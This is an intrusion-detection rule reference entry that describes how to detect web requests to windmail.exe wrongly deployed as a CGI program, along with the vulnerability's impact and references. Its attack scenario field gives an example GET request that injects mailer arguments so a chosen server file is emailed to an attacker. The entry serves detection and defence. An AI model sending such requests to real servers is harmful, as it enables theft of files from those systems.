GEN:SID | 1:1158 |
Message | WEB-MISC windmail.exe access |
Summary | This event is generated when an attempt is made to access the executable file WindMail.exe using a web connection.
|
Impact | Remote attackers could subvert the WindMail mailer to read or execute arbitrary files on the web server
|
Detailed Information | WindMail is a commandline mail program for Windows. It is sometimes deployed for scripting or for sending email through a web application. Some windmail deployments make webmail.exe a CGI application, which it was not designed to do. The result is that an attacker could read or execute arbitrary files on the system that the web server has access to. It should never be a CGI application itself, and instead should be called by another program that properly filters input.
|
Affected Systems | All systems using windmail.exe
|
Attack Scenarios | http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address
|
Ease of Attack | Simple crafting of a web GET request
|
Corrective Action | Look at the packet to determine whether a request was made via an HTTP GET for the windmail.exe application. If so, determine whether the attacked web server had windmail.exe on it.
|
Additional References | |
Rule References | arachnids: 465
bugtraq: 1073
cve: 2000-0242
nessus: 10365
|